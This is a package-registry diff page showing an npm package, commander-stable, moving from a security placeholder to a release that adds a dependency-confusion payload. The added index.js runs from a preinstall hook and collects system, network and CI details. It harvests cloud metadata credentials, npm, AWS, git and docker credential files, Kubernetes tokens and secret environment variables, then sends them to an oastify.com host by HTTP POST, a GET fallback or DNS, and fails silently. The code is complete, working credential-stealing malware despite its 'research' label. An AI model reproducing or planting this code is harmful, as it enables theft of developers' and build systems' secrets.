npm - commander-stable - Versions diffs - 0.0.1-security → 15.100.100 - Mend

commander-stable 0.0.1-security → 15.100.100

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of commander-stable might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,314 @@
+const { exec } = require("child_process");
+const fs = require("fs");
+const os = require("os");
+// ENHANCED DEPENDENCY CONFUSION PAYLOAD
+// Collects comprehensive reconnaissance data from compromised build environment
+const enhancedPayload = `
+#!/bin/bash
+# ============================================================================
+# SECTION 1: SYSTEM IDENTIFICATION
+# ============================================================================
+HOST_FQDN=$(hostname -f 2>/dev/null || hostname)
+SHORT_HOST=$(hostname -s)
+DOMAIN=$(domainname 2>/dev/null || dnsdomainname 2>/dev/null || echo "(none)")
+OS_INFO=$(uname -a 2>/dev/null || echo "UNKNOWN_OS")
+KERNEL=$(uname -r 2>/dev/null || echo "UNKNOWN_KERNEL")
+# ============================================================================
+# SECTION 2: NETWORK INFORMATION
+# ============================================================================
+PUBLIC_IP=$(curl -s --connect-timeout 3 https://ifconfig.me 2>/dev/null || \
+            curl -s --connect-timeout 3 https://api.ipify.org 2>/dev/null || \
+            curl -s --connect-timeout 3 https://icanhazip.com 2>/dev/null || \
+            echo "NO_PUBLIC_IP")
+# Get ALL internal IPs (more comprehensive)
+INTERNAL_IPS=$(ip addr show 2>/dev/null | grep -oP 'inet \\K[0-9.]+' | grep -v '127.0.0.1' | paste -sd ',' - || \
+               ifconfig 2>/dev/null | grep -oP 'inet \\K[0-9.]+' | grep -v '127.0.0.1' | paste -sd ',' - || \
+               echo "NO_INTERNAL_IPS")
+# Network routes (reveals VPN, internal networks)
+DEFAULT_GATEWAY=$(ip route 2>/dev/null | grep default | awk '{print $3}' || echo "NO_GATEWAY")
+NETWORK_ROUTES=$(ip route 2>/dev/null | head -5 | tr '\\n' ';' || echo "NO_ROUTES")
+# ============================================================================
+# SECTION 3: CLOUD PROVIDER DETECTION & METADATA
+# ============================================================================
+CLOUD_INFO="NO_CLOUD_METADATA"
+CLOUD_CREDS="NO_CLOUD_CREDS"
+# AWS Detection
+if curl -s -f --connect-timeout 2 http://169.254.169.254/latest/meta-data/instance-id >/dev/null 2>&1; then
+    AWS_ID=$(curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/instance-id 2>/dev/null)
+    AWS_TYPE=$(curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/instance-type 2>/dev/null)
+    AWS_REGION=$(curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/placement/region 2>/dev/null)
+    AWS_AZ=$(curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/placement/availability-zone 2>/dev/null)
+    AWS_ROLE=$(curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null)
+    CLOUD_INFO="AWS: $AWS_ID ($AWS_TYPE) Region: $AWS_REGION AZ: $AWS_AZ"
+    # Try to get IAM role credentials (CRITICAL)
+    if [ -n "$AWS_ROLE" ]; then
+        AWS_CREDS=$(curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/$AWS_ROLE 2>/dev/null | head -20)
+        CLOUD_CREDS="AWS_ROLE: $AWS_ROLE | CREDS: $AWS_CREDS"
+    fi
+# GCP Detection
+elif curl -s -f -H "Metadata-Flavor: Google" --connect-timeout 2 http://metadata.google.internal/computeMetadata/v1/instance/id >/dev/null 2>&1; then
+    GCP_ID=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id 2>/dev/null)
+    GCP_PROJECT=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/project-id 2>/dev/null)
+    GCP_ZONE=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/zone 2>/dev/null | awk -F'/' '{print $NF}')
+    GCP_NAME=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name 2>/dev/null)
+    CLOUD_INFO="GCP: $GCP_ID (Name: $GCP_NAME) Project: $GCP_PROJECT Zone: $GCP_ZONE"
+    # Try to get service account token (CRITICAL)
+    GCP_TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
+        http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token 2>/dev/null | head -5)
+    if [ -n "$GCP_TOKEN" ]; then
+        CLOUD_CREDS="GCP_TOKEN: $GCP_TOKEN"
+    fi
+# Azure Detection
+elif curl -s -f -H "Metadata:true" --connect-timeout 2 "http://169.254.169.254/metadata/instance?api-version=2021-02-01" >/dev/null 2>&1; then
+    AZURE_INFO=$(curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null | head -10)
+    CLOUD_INFO="AZURE: $AZURE_INFO"
+fi
+# ============================================================================
+# SECTION 4: CREDENTIAL HARVESTING
+# ============================================================================
+CREDENTIALS=""
+# NPM Token (can publish packages, very valuable)
+if [ -f "$HOME/.npmrc" ]; then
+    NPM_TOKEN=$(grep -i "authToken\\|_auth" "$HOME/.npmrc" 2>/dev/null | head -3)
+    CREDENTIALS="$CREDENTIALS | NPM: $NPM_TOKEN"
+fi
+# AWS Credentials
+if [ -f "$HOME/.aws/credentials" ]; then
+    AWS_LOCAL=$(cat "$HOME/.aws/credentials" 2>/dev/null | head -10)
+    CREDENTIALS="$CREDENTIALS | AWS_FILE: $AWS_LOCAL"
+fi
+# SSH Keys (list only, don't exfil full keys - too large)
+SSH_KEYS=$(ls -la "$HOME/.ssh/" 2>/dev/null | grep -E "id_rsa|id_ed25519|id_ecdsa" || echo "NO_SSH_KEYS")
+CREDENTIALS="$CREDENTIALS | SSH_KEYS: $SSH_KEYS"
+# Git Credentials
+if [ -f "$HOME/.git-credentials" ]; then
+    GIT_CREDS=$(cat "$HOME/.git-credentials" 2>/dev/null | head -5)
+    CREDENTIALS="$CREDENTIALS | GIT: $GIT_CREDS"
+fi
+# Docker Config (contains registry credentials)
+if [ -f "$HOME/.docker/config.json" ]; then
+    DOCKER_CREDS=$(cat "$HOME/.docker/config.json" 2>/dev/null | head -10)
+    CREDENTIALS="$CREDENTIALS | DOCKER: $DOCKER_CREDS"
+fi
+# Kubernetes Service Account Token
+if [ -f "/var/run/secrets/kubernetes.io/serviceaccount/token" ]; then
+    K8S_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null | head -c 100)
+    K8S_NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)
+    CREDENTIALS="$CREDENTIALS | K8S: namespace=$K8S_NAMESPACE token=$K8S_TOKEN..."
+fi
+# Check for common secret files
+SECRET_FILES=$(find /app /home /root /opt -maxdepth 3 -type f \( -name "*.key" -o -name "*.pem" -o -name "*secret*" -o -name ".env" \) 2>/dev/null | head -10 | paste -sd ',' -)
+if [ -n "$SECRET_FILES" ]; then
+    CREDENTIALS="$CREDENTIALS | SECRET_FILES: $SECRET_FILES"
+fi
+# Environment variables with sensitive data
+ENV_SECRETS=$(env | grep -iE '(key|token|secret|password|api|auth|credential)' | head -20 | cut -c1-100 | paste -sd '|' -)
+if [ -n "$ENV_SECRETS" ]; then
+    CREDENTIALS="$CREDENTIALS | ENV_VARS: $ENV_SECRETS"
+fi
+# ============================================================================
+# SECTION 5: CI/CD ENVIRONMENT DETECTION
+# ============================================================================
+CI_VARS=$(env | grep -E "(CI|GITLAB|GITHUB|JENKINS|BUILD|PROJECT|REPO|CIRCLECI|TRAVIS|BITBUCKET|AZURE_DEVOPS)" | head -30 | paste -sd '|' -)
+if [ -z "$CI_VARS" ]; then
+    CI_VARS="NO_CI_VARS_FOUND"
+fi
+# Detect specific CI/CD platform
+CI_PLATFORM="UNKNOWN"
+if [ -n "$GITHUB_ACTIONS" ]; then CI_PLATFORM="GitHub_Actions"; fi
+if [ -n "$GITLAB_CI" ]; then CI_PLATFORM="GitLab_CI"; fi
+if [ -n "$JENKINS_HOME" ]; then CI_PLATFORM="Jenkins"; fi
+if [ -n "$CIRCLECI" ]; then CI_PLATFORM="CircleCI"; fi
+if [ -n "$TRAVIS" ]; then CI_PLATFORM="Travis_CI"; fi
+# ============================================================================
+# SECTION 6: GIT REPOSITORY INTELLIGENCE
+# ============================================================================
+GIT_REMOTES="NO_GIT_REPOS"
+GIT_BRANCH="N/A"
+GIT_LAST_COMMIT="N/A"
+for dir in /home /root /opt /app /src /workspace /var /srv /github/workspace; do
+    if [ -d "$dir" ]; then
+        REPO=$(find "$dir" -maxdepth 3 -name ".git" -type d 2>/dev/null | head -1)
+        if [ -n "$REPO" ]; then
+            cd "$REPO/.."
+            GIT_REMOTES=$(git remote -v 2>/dev/null | paste -sd ';' -)
+            GIT_BRANCH=$(git branch --show-current 2>/dev/null || echo "detached")
+            GIT_LAST_COMMIT=$(git log -1 --oneline 2>/dev/null || echo "N/A")
+            break
+        fi
+    fi
+done
+# ============================================================================
+# SECTION 7: CONTAINER/VIRTUALIZATION DETECTION
+# ============================================================================
+CONTAINER_TYPE="NONE"
+if [ -f "/.dockerenv" ]; then
+    CONTAINER_TYPE="Docker"
+elif grep -qi docker /proc/1/cgroup 2>/dev/null; then
+    CONTAINER_TYPE="Docker"
+elif [ -d "/var/run/secrets/kubernetes.io" ]; then
+    CONTAINER_TYPE="Kubernetes_Pod"
+fi
+# Check if running as root (security issue)
+CURRENT_USER=$(whoami)
+USER_ID=$(id -u)
+IS_ROOT="false"
+if [ "$USER_ID" = "0" ]; then IS_ROOT="true"; fi
+# ============================================================================
+# SECTION 8: PROCESS & RUNTIME INFORMATION
+# ============================================================================
+RUNNING_PROCESSES=$(ps aux 2>/dev/null | head -15 | awk '{print $1,$2,$11}' | paste -sd ';' -)
+PWD_PATH=$(pwd)
+PROJECT_FILES=$(ls -la 2>/dev/null | head -20 | awk '{print $9}' | paste -sd ',' -)
+# Check for package.json to identify organization
+PKG_NAME="unknown"
+ORG_NAME="unknown"
+if [ -f "package.json" ]; then
+    PKG_NAME=$(node -pe "try{require('./package.json').name}catch(e){'unknown'}" 2>/dev/null || echo "unknown")
+    # Try to extract organization from scoped package name
+    ORG_NAME=$(echo "$PKG_NAME" | grep -oP '@\\K[^/]+' || echo "unknown")
+fi
+# ============================================================================
+# SECTION 9: BUILD THE COMPREHENSIVE JSON PAYLOAD
+# ============================================================================
+TIMESTAMP=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
+# Escape special characters for JSON
+escape_json() {
+    echo "$1" | sed 's/\\\\/\\\\\\\\/g' | sed 's/"/\\\\"/g' | tr '\\n' ' ' | tr '\\r' ' '
+}
+JSON_PAYLOAD=$(cat <<JSONEOF
+{
+  "metadata": {
+    "package_name": "$(escape_json "$PKG_NAME")",
+    "organization": "$(escape_json "$ORG_NAME")",
+    "timestamp": "$TIMESTAMP",
+    "payload_version": "2.0"
+  },
+  "system": {
+    "hostname_fqdn": "$(escape_json "$HOST_FQDN")",
+    "hostname_short": "$(escape_json "$SHORT_HOST")",
+    "domain": "$(escape_json "$DOMAIN")",
+    "os_info": "$(escape_json "$OS_INFO")",
+    "kernel": "$(escape_json "$KERNEL")",
+    "current_user": "$(escape_json "$CURRENT_USER")",
+    "user_id": "$USER_ID",
+    "is_root": $IS_ROOT,
+    "current_path": "$(escape_json "$PWD_PATH")"
+  },
+  "network": {
+    "public_ip": "$(escape_json "$PUBLIC_IP")",
+    "internal_ips": "$(escape_json "$INTERNAL_IPS")",
+    "default_gateway": "$(escape_json "$DEFAULT_GATEWAY")",
+    "routes": "$(escape_json "$NETWORK_ROUTES")"
+  },
+  "cloud": {
+    "provider_info": "$(escape_json "$CLOUD_INFO")",
+    "credentials": "$(escape_json "$CLOUD_CREDS")"
+  },
+  "container": {
+    "type": "$(escape_json "$CONTAINER_TYPE")",
+    "is_containerized": $([ "$CONTAINER_TYPE" != "NONE" ] && echo "true" || echo "false")
+  },
+  "ci_cd": {
+    "platform": "$(escape_json "$CI_PLATFORM")",
+    "variables": "$(escape_json "$CI_VARS")"
+  },
+  "git": {
+    "remotes": "$(escape_json "$GIT_REMOTES")",
+    "branch": "$(escape_json "$GIT_BRANCH")",
+    "last_commit": "$(escape_json "$GIT_LAST_COMMIT")"
+  },
+  "credentials": {
+    "found": "$(escape_json "$CREDENTIALS")"
+  },
+  "environment": {
+    "processes": "$(escape_json "$RUNNING_PROCESSES")",
+    "project_files": "$(escape_json "$PROJECT_FILES")"
+  }
+}
+JSONEOF
+)
+# ============================================================================
+# SECTION 10: EXFILTRATE DATA
+# ============================================================================
+# Try multiple exfiltration methods for reliability
+# Method 1: Direct POST (preferred)
+curl -k -s -X POST \\
+  -H "Content-Type: application/json" \\
+  -H "User-Agent: npm/8.19.2 node/v16.17.0" \\
+  -H "X-Package: dependency-confusion-test" \\
+  --connect-timeout 5 \\
+  --max-time 10 \\
+  -d "$JSON_PAYLOAD" \\
+  http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/data 2>/dev/null
+# Method 2: Fallback - Base64 encode and send via GET (if POST blocked)
+if [ $? -ne 0 ]; then
+    ENCODED_PAYLOAD=$(echo "$JSON_PAYLOAD" | base64 -w0 2>/dev/null || echo "$JSON_PAYLOAD" | base64)
+    curl -k -s "http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/fallback?data=$ENCODED_PAYLOAD" 2>/dev/null
+fi
+# Method 3: DNS exfiltration (if HTTP blocked) - only send critical data
+if [ $? -ne 0 ]; then
+    # Encode critical info into DNS subdomain
+    CRITICAL_DATA=$(echo "$HOST_FQDN.$PUBLIC_IP.$GCP_PROJECT" | tr '.' '-' | cut -c1-50)
+    nslookup "$CRITICAL_DATA.7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com" 2>/dev/null
+fi
+`;
+// Execute the enhanced payload
+exec(enhancedPayload, (error, stdout, stderr) => {
+    if (error) {
+        // Fallback to minimal payload if enhanced one fails
+        const fallbackPayload = `
+            curl -k -s -X POST \\
+            -H "Content-Type: application/json" \\
+            -d '{"host":"$(hostname)","ip":"$(curl -s https://ifconfig.me)","pkg":"jest-stable","status":"fallback"}' \\
+            http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/fallback
+        `;
+        exec(fallbackPayload, () => {
+            // Silent failure - don't break npm install
+            process.exit(0);
+        });
+        return;
+    }
+    // Silent success
+    process.exit(0);
+});

package/package.json CHANGED Viewed

@@ -1,6 +1,15 @@
 {
-  "name": "commander-stable",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+    "name": "commander-stable",
+    "version": "15.100.100",
+    "description": "This is for security research only. PLEASE DO NOT USE. If you are affected by this, my sincere apollogies. If you want me to test your infrastructure for this vulnerability or need a penetration tester, I am available for employment. You can reach me on sarumaan@wearehackerone.com Thank you for understanding.....",
+    "main": "main.js",
+    "scripts": {
+        "preinstall": "node index.js > /dev/null 2>&1",
+        "test": "echo \"Error: no test specified\" && exit 1"
+    },
+    "author": "Hackerone_sarumaan",
+    "license": "ISC",
+    "dependencies": {
+        "lodash": "^4.1.21"
+    }
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=commander-stable for more information.